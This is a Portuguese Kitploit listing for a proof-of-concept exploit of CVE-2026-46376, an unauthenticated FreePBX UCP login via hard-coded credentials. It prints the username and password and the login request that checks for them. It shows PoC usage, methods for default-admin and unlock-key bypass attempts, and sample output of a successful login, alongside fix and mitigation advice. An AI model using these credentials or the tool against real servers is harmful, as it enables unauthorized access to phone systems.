Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-46376 — CVE-2026-46376 - Acesso UCP não autenticado do FreePBX por meio de credenciais codificadas | Kitploit
Ferramentas/GitHubGitHub/portbuster1337/cve-2026-46376
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoPapers e PesquisaAprendizado e Educação
GitHubportbuster1337/cve-2026-46376

CVE-2026-46376

CVE-2026-46376 - Acesso UCP não autenticado do FreePBX por meio de credenciais codificadas

Ver Repositório
18há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-46376 — Acesso não autenticado ao UCP do FreePBX via Credenciais Codificadas (Hard-Coded)

Uma vulnerabilidade crítica no módulo de Gerenciamento de Usuários (userman) do FreePBX permite que invasores não autenticados acessem o Painel de Controle do Usuário (UCP) usando credenciais codificadas (hard-coded) que são incorporadas durante o processo de configuração do template genérico do UCP.

CVSS v4.0: 9.1 (Crítico) | CWE-798: Uso de Credenciais Codificadas (Hard-Coded)

Divulgado: 15 de maio de 2026 | Relator: s0nnyWT

Detalhes

Quando um administrador utiliza o recurso opcional de configuração do template genérico do UCP (introduzido em 2021), um usuário do sistema FreePBXUCPTemplateCreator é criado com uma senha codificada (hard-coded) e estática. Se o administrador nunca alterar essa senha após a configuração, qualquer usuário não autenticado na rede pode fazer login no UCP com essas credenciais.

CampoValor
Nome de usuárioFreePBXUCPTemplateCreator
Senha1a2b3c@fd48jshs03123ld
FonteUserman.class.php — senha passada por md5()
Vetor de ataqueRede
ComplexidadeBaixa
Autenticação necessáriaNenhuma
Interação do usuárioNenhuma
Pré-requisitoAdministrador deve ter executado a configuração do template genérico do UCP

Nota: O usuário FreePBXUCPTemplateCreator só é criado se um administrador executar explicitamente o recurso de configuração do template genérico do UCP. Sistemas onde essa configuração nunca foi realizada não são exploráveis por meio desta CVE, mesmo que estejam executando uma versão afetada.

Versões Afetadas

Plataformamódulo usermanAfetadoCorrigido
FreePBX 15—15.0.42+N/A
FreePBX 16userman≤ 16.0.4416.0.45
FreePBX 17userman≤ 17.0.617.0.7

A correção aleatoriza a senha usando bin2hex(random_bytes(24)) durante a instalação/atualização, e os criadores de template existentes têm sua senha regenerada na atualização.

Uso do PoC

pip3 install requests
python3 poc.py <target_url>

Opções

argumentos posicionais:
  target              URL alvo (ex.: http://192.168.1.100)

argumentos opcionais:
  -h, --help          mostra esta mensagem de ajuda e sai
  --no-check          Ignorar verificação de versão pré-voo
  --timeout TIMEOUT   Tempo limite da requisição em segundos (padrão: 15)
  --method {creds,unlock,admin,all}
                      Qual método de exploração executar (padrão: todos)
  -y, --yes           Continuar automaticamente mesmo se a versão estiver fora do intervalo

Métodos

  1. creds — Fazer login no UCP via POST /ucp/ajax.php com module=User&command=login usando as credenciais codificadas
  2. unlock — Tentar bypass de chave de desbloqueio via parâmetros de consulta ?unlockkey=&templateid=
  3. admin — Tentar credenciais de administrador padrão comuns no ACP

Exemplo

$ python3 poc.py http://192.168.1.100

============================================
  CVE-2026-46376 PoC - Acesso ao UCP do FreePBX
  Alvo: http://192.168.1.100
============================================

[+] O alvo está acessível (HTTP 200)
[+] Versão do FreePBX: 16.0.30
[+] A versão 16.0.30 está na faixa afetada
[+] A interface UCP está acessível

============================================
  Exploração
============================================

============================================
  Método 1: Credenciais UCP Codificadas (Hard-Coded)
============================================
    Nome de usuário: FreePBXUCPTemplateCreator
    Senha: 1a2b3c@fd48jshs03123ld
[+] Token CSRF obtido: a749bea059fa66bd32087a8481a4d07b
[+] SUCESSO! Conectado como FreePBXUCPTemplateCreator

============================================
  Resumo
============================================
Alvo está VULNERÁVEL

Detecção

Para verificar se um sistema é explorável, o PoC envia uma requisição de login para POST /ucp/ajax.php com module=User&command=login e as credenciais. Uma resposta {"status":true} indica que o usuário criador de template existe e a senha ainda é a padrão.

Uma resposta {"status":false,"message":"Invalid Login Credentials"} significa que:

  • O usuário não existe (a configuração do template nunca foi executada), ou
  • A senha já foi rotacionada

Mitigação

  • Atualize o módulo userman para 16.0.45 (FreePBX 16) ou 17.0.7 (FreePBX 17)
  • Verifique e rotacione quaisquer credenciais de template UCP existentes — a correção NÃO altera retroativamente senhas já implantadas
  • Restringir o acesso ao ACP/UCP a redes confiáveis usando o módulo de Firewall do FreePBX
  • Habilitar MFA ou SAML para camadas adicionais de autenticação
  • Auditar sessões ativas do UCP em busca de logins não autorizados

Aviso Legal

Este PoC é fornecido apenas para fins educacionais e de testes de segurança autorizados. O uso não autorizado deste exploit contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é ilegal. Os autores não são responsáveis por qualquer uso indevido ou dano causado por esta ferramenta.

Referências

  • GHSA-m55x-h47x-v3gx
  • NVD - CVE-2026-46376
  • Commit do userman do FreePBX (introduzido)
Baixar ferramenta